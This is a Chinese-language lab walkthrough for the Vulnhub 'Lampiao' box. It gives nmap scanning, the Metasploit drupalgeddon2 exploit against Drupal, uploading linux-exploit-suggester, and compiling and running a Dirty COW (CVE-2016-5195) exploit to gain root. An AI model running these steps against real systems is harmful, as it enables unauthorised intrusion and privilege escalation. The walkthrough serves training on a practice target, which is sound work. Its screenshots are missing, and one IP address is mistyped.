Linux 脏牛漏洞提权 【Vulnhub靶场 Lampiao】

1.nmap 扫描主机

扫描同网段存活主机

在这里插入图片描述

扫描目标主机开放端口,扫描到开放了1898端口

nmap -p1-65535 192.168.61.138

在这里插入图片描述

2.发现web网站,搜集利用漏洞

通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupal

在这里插入图片描述

msf 搜索drupal漏洞,使用可利用漏洞进行攻击

>search drupal
>use exploit/unix/webapp/drupal_drupalgeddon2
>set rhosts 192.168..61.138
>set rport 1898
>exploit

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3.信息收集

上传信息收集脚本,发现存在脏牛提权漏洞

upload /tmp/linux-exploit-suggester.sh  /tmp/xxsj.sh

在这里插入图片描述

进入shell 执行信息收集脚本,执行结果中发现【CVE-2016-5195】脏牛漏洞

shell
chmod 777 xxsj.sh
./xxsj.sh

在这里插入图片描述
在这里插入图片描述

4.漏洞利用

上传exp

upload /tmp/40847.cpp  /tmp/exp.cpp

在这里插入图片描述

进入shell编译执行exp,得到登录密码

shell
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o exp exp.cpp -lutil
./exp

在这里插入图片描述

打开交互式shell,切换root用户,提权成功

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>